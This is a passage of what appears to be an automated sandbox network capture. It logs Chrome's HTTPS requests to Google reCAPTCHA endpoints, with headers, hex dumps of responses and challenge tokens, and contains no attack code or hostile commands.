                                                                                                                          2024-12-19 16:08:55 UTC825INData Raw: dd b9 97 f5 64 17 fb 5f d7 61 f0 dc 49 15 d5 b7 94 83 fd 19 55 82 90 b9 6c 64 00 4e 09 5f c8 e3 1d 39 ac 4f 0e dd c7 75 25 e4 b0 c9 03 32 ea 33 6c 59 93 73 64 f2 5b 0c 32 4e 0e 30 3d eb a1 b1 d8 92 86 11 80 0c c0 2f cd e5 02 39 66 2a 87 9d a0 39 e4 13 9f 6c d5 2f 07 c1 2e a5 af 6a b6 d0 49 34 fe 66 a0 fe 53 42 4a 90 a1 41 03 a6 41 c0 3e a3 d7 18 c5 70 4e 31 86 21 36 b6 8b fe bb 9d 50 a6 96 16 5b e8 fe fd 3f ae bd 47 26 d6 84 da c4 57 6f 96 a5 c0 42 5f 04 84 62 a0 80 7d 06 3a 7d ee 98 02 ac 4d 0c eb 23 a9 9b 70 52 5b 63 86 56 40 4e 01 de 0f 27 91 d0 8c 6e 07 d0 8e f6 1f 01 c6 03 c7 7b 7e ef 14 8e 58 08 be f3 27 ca 78 3d 00 c1 6c 9f 7e f9 e3 a2 b5 d1 b4 78 ad 96 38 74 db 5f 98 15 62 d1 ef 2e 32 a3 8d c3 3c 01 8c 60 f0 47 03 23 3a 4a bc 6d 7b 5c 85 41 cb 56
                                                                                                                          Data Ascii: d_aIUldN_9Ou%23lYsd[2N0=/9f*9l/.jI4fSBJAA>pN1!6P[?G&WoB_b}:}M#pR[cV@N'n{~X'x=l~x8t_b.2<`G#:Jm{\AV
                                                                                                                          2024-12-19 16:08:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.1649776172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:55 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:55 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:55 GMT
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Allow: POST
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:55 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:08:55 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:08:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.1649777172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:57 UTC836OUTGET /recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbf HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:58 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:58 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:58 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:58 UTC709INData Raw: 31 36 34 30 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1640JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:58 UTC1390INData Raw: 35 d4 c9 21 64 58 44 77 11 6d 25 f3 b0 b6 70 41 cf 18 19 07 38 fc 33 d2 b5 ad 2f 69 2d 1e e6 74 29 c9 45 46 4b cc f3 6f 8c b7 2b 66 f6 53 c9 66 f2 ce 5f cb 8a 63 20 70 bc 61 c1 eb 8e 70 4f 19 e9 df 38 f3 25 74 49 6e 15 b0 e5 90 85 11 f4 50 54 00 48 27 27 0a 0f 20 1c 9f a9 15 f4 4e b5 a4 d9 ea 08 8f ab 29 92 14 00 2c 61 89 4d ac 30 32 41 03 8e 0f 4f 7e f5 e2 de 3b d0 6e 3c 33 ac b2 aa c6 2d e4 97 7c 4a 4e 3e 50 78 00 b7 52 14 63 03 8e 3d eb af 0b 56 32 8f 2a dd af bf af dc 71 e2 29 6b ce ba ff 00 9f f5 b7 cc f3 df 1a 9d 2d cc 3f 6b 79 4c f7 20 c8 cd 0c 7c ec 3b 88 5e 30 32 4e 00 fe ea fe 55 53 51 d7 ad f4 6b 2b 2b 4d 2d 59 66 b8 84 fd a4 90 52 32 fc e1 46 0f 1b 57 e5 cf 5c 93 d4 62 ba 4b db 3b 3b b0 d7 45 5c 3a 46 fe 56 59 d8 6e c9 db 83 f7 8f 1b 48 c1 e8
                                                                                                                          Data Ascii: 5!dXDwm%pA83/i-t)EFKo+fSf_c papO8%tInPTH'' N),aM02AO~;n<3-|JN>PxRc=V2*q)k-?kyL |;^02NUSQk++M-YfR2FW\bK;;E\:FVYnH
                                                                                                                          2024-12-19 16:08:58 UTC1390INData Raw: cc 40 39 50 41 04 80 01 18 f5 c8 fc 5a a0 9b 08 24 13 ac 52 c9 9d b1 c8 4b 67 20 fc d8 1c 29 1b f1 c0 c7 cd f9 cf f6 68 e2 11 13 6e 18 a3 96 6f 97 62 0c fc d9 1b 4f 23 e5 03 9e 06 3a 55 73 ad b7 6e ff 00 d7 f5 72 79 be ca d5 fe 3b ff 00 5d fd 34 29 08 bc c6 77 31 40 49 6c e0 3b 0c 7b 75 e7 f0 a2 a6 10 b5 c3 bb a6 9e 5d 41 0a 19 da 48 4b 00 a0 03 85 38 e9 8e 79 3e f4 52 95 59 c5 d9 46 ff 00 7f f9 94 a3 87 7f 13 d7 d1 9a 37 93 49 b6 49 9d ae 04 fe 50 56 65 8d 8b ed 19 24 1d a4 ff 00 77 ae 48 e7 19 c6 69 b2 49 32 c6 44 36 ab 9f 30 01 e5 39 44 dc 79 da 02 f6 07 2c 33 c7 1e 9c d4 d7 53 ae d7 8a ed 21 7f de 96 65 12 2c 7b 4f 0b ca 9e 99 0c 3a e4 7d 01 c5 57 b8 fb 5a dc 94 71 f6 89 23 cc 8e 92 6e 0b 23 01 9e bc 12 41 c9 03 db 1d f0 05 08 d9 2d bf af 90 e0 9d 92
                                                                                                                          Data Ascii: @9PAZ$RKg )hnobO#:Usnry;]4)w1@Il;{u]AHK8y>RYF7IIPVe$wHiI2D609Dy,3S!e,{O:}WZq#n#A-
                                                                                                                          2024-12-19 16:08:58 UTC1390INData Raw: ac 90 e1 6d 18 ac 7b be f0 63 f3 7c c3 83 c8 dc dc 11 82 08 ce 07 7c d2 ac 91 46 a6 76 d8 a8 a5 02 0c 90 a4 61 89 24 63 e6 5d cb f7 73 d8 f4 0d 52 a2 9d d0 a4 5e 51 92 37 11 ac 72 0e 24 3f c4 9c e0 e0 fd 3b 62 96 40 93 dc a6 37 cd 78 91 6c 91 77 8c ca 07 00 0e f8 da 0f ae 7d 46 2b a9 be fb 9c 8e e9 d9 ef fd 7f 5f 81 16 a2 21 49 bc b9 24 b6 65 03 cc 5f dd 8d e3 aa 03 bb 69 db d3 23 3d 81 cf 15 1d 8c b0 4b 20 7b 2b 92 16 22 a9 0b 2c b9 27 e7 2a 55 b2 38 1b 77 73 da a5 96 e9 6e 2d 6e 56 56 f2 91 65 f2 fe 52 a4 44 01 04 10 dc 67 a9 e7 d7 3c 11 4b 2c d2 4d 78 c1 84 b0 3c a5 b8 79 5b 73 00 71 8c 83 cf dd e3 81 c9 ed 8c 03 95 a5 6f eb fe 1f fa ec 27 0e 45 af 4d fc ff 00 af eb 41 91 5a d9 dc 34 93 c9 62 a5 99 fb 94 88 00 00 00 0c 9e 40 00 0c fa e4 76 a2 ad 5b db
                                                                                                                          Data Ascii: m{c||Fva$c]sR^Q7r$?;b@7xlw}F+_!I$e_i#=K {+",'*U8wsn-nVVeRDg<K,Mx<y[sqo'EMAZ4b@v[
                                                                                                                          2024-12-19 16:08:58 UTC825INData Raw: dd b9 97 f5 64 17 fb 5f d7 61 f0 dc 49 15 d5 b7 94 83 fd 19 55 82 90 b9 6c 64 00 4e 09 5f c8 e3 1d 39 ac 4f 0e dd c7 75 25 e4 b0 c9 03 32 ea 33 6c 59 93 73 64 f2 5b 0c 32 4e 0e 30 3d eb a1 b1 d8 92 86 11 80 0c c0 2f cd e5 02 39 66 2a 87 9d a0 39 e4 13 9f 6c d5 2f 07 c1 2e a5 af 6a b6 d0 49 34 fe 66 a0 fe 53 42 4a 90 a1 41 03 a6 41 c0 3e a3 d7 18 c5 70 4e 31 86 21 36 b6 8b fe bb 9d 50 a6 96 16 5b e8 fe fd 3f ae bd 47 26 d6 84 da c4 57 6f 96 a5 c0 42 5f 04 84 62 a0 80 7d 06 3a 7d ee 98 02 ac 4d 0c eb 23 a9 9b 70 52 5b 63 86 56 40 4e 01 de 0f 27 91 d0 8c 6e 07 d0 8e f6 1f 01 c6 03 c7 7b 7e ef 14 8e 58 08 be f3 27 ca 78 3d 00 c1 6c 9f 7e f9 e3 a2 b5 d1 b4 78 ad 96 38 74 db 5f 98 15 62 d1 ef 2e 32 a3 8d c3 3c 01 8c 60 f0 47 03 23 3a 4a bc 6d 7b 5c 85 41 cb 56
                                                                                                                          Data Ascii: d_aIUldN_9Ou%23lYsd[2N0=/9f*9l/.jI4fSBJAA>pN1!6P[?G&WoB_b}:}M#pR[cV@N'n{~X'x=l~x8t_b.2<`G#:Jm{\AV
                                                                                                                          2024-12-19 16:08:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.1649778172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:59 UTC996OUTPOST /recaptcha/api2/userverify?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 7073
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:59 UTC7073OUTData Raw: 76 3d 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 26 63 3d 30 33 41 46 63 57 65 41 35 2d 4f 79 4c 6d 78 6c 7a 79 46 31 73 77 4f 6a 4a 39 61 38 69 5f 6e 45 4b 69 7a 43 74 68 36 56 34 35 41 32 42 7a 6a 75 54 53 69 4b 59 61 6f 71 62 4f 54 42 62 75 64 68 66 71 53 74 2d 58 63 72 48 41 50 35 6b 44 67 65 62 33 33 44 64 36 76 31 36 65 51 77 39 5a 35 43 63 44 41 6c 78 43 6b 41 4d 4a 6c 50 72 72 55 69 62 55 38 47 48 52 30 6a 34 58 48 33 77 6a 45 58 52 4e 4c 64 68 41 65 76 74 39 57 43 39 70 76 32 2d 77 4f 59 6a 62 31 44 58 45 6a 2d 75 67 38 79 72 56 56 78 63 49 5f 6c 52 4e 30 72 6d 57 78 6c 4f 66 70 4b 56 42 37 59 5a 38 64 48 70 38 31 57 4c 32 76 41 70 6c 52 34 41 52 59 54 6e 42 54 65 2d 48 71 43 74 57 55 39 58 53 73 38 33 4a 43 62 43 65
                                                                                                                          Data Ascii: v=nhamhfA6n_hKMa_Y7UpFyA37&c=03AFcWeA5-OyLmxlzyF1swOjJ9a8i_nEKizCth6V45A2BzjuTSiKYaoqbOTBbudhfqSt-XcrHAP5kDgeb33Dd6v16eQw9Z5CcDAlxCkAMJlPrrUibU8GHR0j4XH3wjEXRNLdhAevt9WC9pv2-wOYjb1DXEj-ug8yrVVxcI_lRN0rmWxlOfpKVB7YZ8dHp81WL2vAplR4ARYTnBTe-HqCtWU9XSs83JCbCe
                                                                                                                          2024-12-19 16:09:00 UTC838INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:59 GMT
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:09:00 UTC552INData Raw: 61 34 62 0d 0a 29 5d 7d 27 0a 5b 22 75 76 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 41 73 49 44 6a 61 6b 49 50 61 64 43 42 37 78 55 5f 30 38 65 48 6c 2d 6c 4b 69 48 6a 30 7a 46 61 68 31 54 6f 33 4f 31 71 67 31 66 4f 37 69 47 30 7a 39 31 43 44 4d 31 75 7a 2d 72 4c 31 50 4c 70 48 68 56 44 43 67 42 31 2d 67 73 63 46 39 67 38 54 63 71 34 66 58 68 7a 5f 43 71 68 55 78 68 57 52 78 50 77 58 4e 59 73 61 5a 48 64 48 50 6a 71 61 41 30 74 70 46 50 5a 34 49 63 71 4d 69 44 48 42 65 6b 71 52 45 76 44 33 74 61 37 49 62 63 73 55 50 54 4c 61 2d 58 35 31 6c 65 30 4f 67 55 42 59 5a 59 53 34 31 76 4c 55 45 76 70 4f 39 66 43 39 79 48 34 4b 41 4b 75 74 71 59 55 66 72 63 51 2d 4e 70 53 37 4b 32 32 4f 54 6a 70 37 33 37 6a 34 44 57 31 46 69 45 4e 63 4a 45 46 4d 72 45 51 5f
                                                                                                                          Data Ascii: a4b)]}'["uvresp","03AFcWeA4AsIDjakIPadCB7xU_08eHl-lKiHj0zFah1To3O1qg1fO7iG0z91CDM1uz-rL1PLpHhVDCgB1-gscF9g8Tcq4fXhz_CqhUxhWRxPwXNYsaZHdHPjqaA0tpFPZ4IcqMiDHBekqREvD3ta7IbcsUPTLa-X51le0OgUBYZYS41vLUEvpO9fC9yH4KAKutqYUfrcQ-NpS7K22OTjp737j4DW1FiENcJEFMrEQ_
                                                                                                                          2024-12-19 16:09:00 UTC1390INData Raw: 6b 6e 75 4b 32 4d 76 67 73 7a 45 54 63 30 45 4e 38 42 39 63 77 42 59 54 33 63 50 6e 61 4d 74 63 45 6b 58 49 35 54 61 5a 66 32 6a 4e 32 36 42 4b 32 76 6d 30 35 35 44 75 6a 47 59 31 39 6d 67 35 69 59 70 6b 42 4f 4a 67 79 61 50 4a 33 68 31 72 54 68 62 48 43 70 51 44 41 6b 41 47 4b 57 58 71 42 41 33 4c 30 66 70 63 63 52 4a 32 68 42 61 69 4f 62 58 34 53 74 66 34 34 43 61 4e 4f 44 51 62 57 49 34 2d 44 6f 67 48 61 6c 58 36 37 51 38 6f 36 41 4e 52 43 78 31 48 4b 44 56 62 74 54 67 59 59 54 67 50 45 6a 67 6b 55 72 70 74 64 45 54 6e 73 50 69 67 45 69 32 43 47 34 4e 6e 6a 33 73 67 77 55 42 70 65 78 63 42 53 4a 6b 45 69 4f 45 63 42 30 57 4b 55 46 53 77 46 69 62 33 4e 4f 32 65 4e 72 78 42 32 55 69 73 74 39 4b 73 6e 4d 53 43 53 68 37 49 6f 56 53 39 6e 35 53 38 63 41 76
                                                                                                                          Data Ascii: knuK2MvgszETc0EN8B9cwBYT3cPnaMtcEkXI5TaZf2jN26BK2vm055DujGY19mg5iYpkBOJgyaPJ3h1rThbHCpQDAkAGKWXqBA3L0fpccRJ2hBaiObX4Stf44CaNODQbWI4-DogHalX67Q8o6ANRCx1HKDVbtTgYYTgPEjgkUrptdETnsPigEi2CG4Nnj3sgwUBpexcBSJkEiOEcB0WKUFSwFib3NO2eNrxB2Uist9KsnMSCSh7IoVS9n5S8cAv
                                                                                                                          2024-12-19 16:09:00 UTC700INData Raw: 71 4a 34 62 63 59 6d 47 74 56 2d 68 6d 55 38 6a 4e 57 65 32 7a 47 44 47 70 52 4e 5f 48 59 6f 2d 34 61 4c 6c 74 49 73 75 38 56 41 31 38 57 4a 78 58 78 2d 31 78 48 62 73 4d 4d 57 34 68 74 45 30 5f 41 76 68 51 4c 51 41 4e 2d 54 4a 7a 66 45 49 32 48 4d 64 45 79 41 56 4b 37 59 6a 54 6f 59 30 56 39 4b 63 71 4b 56 4d 43 48 75 79 62 55 62 55 4e 38 52 7a 4d 62 6d 61 63 4b 53 31 5f 45 73 35 65 70 2d 71 70 46 68 4f 62 44 2d 75 6f 62 5a 56 67 77 53 43 58 74 52 4f 35 4e 55 6f 31 37 56 67 47 51 33 47 73 77 31 54 48 66 44 4b 48 4f 63 63 45 46 4a 79 36 34 78 4d 30 6b 4a 71 34 67 78 74 45 6d 51 77 72 6b 2d 66 34 52 77 5f 43 4f 71 61 55 55 47 47 2d 71 73 71 36 64 61 33 66 41 67 4e 31 56 4c 4e 75 6f 72 44 59 62 69 79 6c 4e 57 72 5f 71 57 36 4f 66 6e 75 47 67 6f 6b 4c 72 63
                                                                                                                          Data Ascii: qJ4bcYmGtV-hmU8jNWe2zGDGpRN_HYo-4aLltIsu8VA18WJxXx-1xHbsMMW4htE0_AvhQLQAN-TJzfEI2HMdEyAVK7YjToY0V9KcqKVMCHuybUbUN8RzMbmacKS1_Es5ep-qpFhObD-uobZVgwSCXtRO5NUo17VgGQ3Gsw1THfDKHOccEFJy64xM0kJq4gxtEmQwrk-f4Rw_COqaUUGG-qsq6da3fAgN1VLNuorDYbiylNWr_qW6OfnuGgokLrc
                                                                                                                          2024-12-19 16:09:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.1649779172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:01 UTC610OUTGET /recaptcha/api2/userverify?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:09:02 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:02 GMT
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Allow: POST
